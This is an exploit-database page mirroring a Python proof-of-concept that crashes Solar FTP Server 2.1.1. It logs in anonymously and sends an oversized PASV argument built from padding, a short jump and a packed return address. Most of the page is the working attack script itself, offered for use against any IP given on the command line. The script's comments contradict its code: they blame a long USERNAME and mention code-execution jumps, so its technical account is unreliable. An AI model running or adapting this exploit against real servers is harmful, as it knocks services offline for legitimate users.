Advertisement






Solar FTP 2.1.1 PASV - Denial of Service - DoS

CVE Category Price Severity
CVE-2021-33900 CWE-Other $7,000 High
Author Risk Exploitation Type Date
Manuel Castro High Remote 2024-02-01
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020007

Below is a copy:

Solar FTP 2.1.1 PASV - Denial of Service - DoS
#!/usr/bin/python

# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 31 january 2024
# Vendor Homepage:  N/A
# Download to demo: 
# Notification vendor: No reported
# Tested Version: Solar FTP Server 2.1.1
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vdeo: 

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
import socket,sys,time,struct

if len(sys.argv) < 2:
     print("[-]Usage: %s <ip addr> " % sys.argv[0])
     
     sys.exit(0)

ip = sys.argv[1]

if len(sys.argv) > 2:
     platform = sys.argv[2]



ret = struct.pack('<L', 0x7C9572D8)

#works when the server is on 192.168.133.128
padding = b"\x43" * 468
junk = b"\x43" * 1532
frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21
payload = frontpad + ret + padding + junk

print ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")
print ("[+] Connecting to "+ip)

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((ip,21))
except:
    print("[-] Connection to "+ip+" failed!")
    sys.exit(0)

print ("[+] Exploiting")
print("[*] Sending payload to command PASV...")

s.send(b"USER anon\r\n")
s.recv(1024)
s.send(b"PASS anon\r\n")
s.recv(1024)
s.send(b"PASV " + payload + b"\r\n")
print("[+] Done - Exploited")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.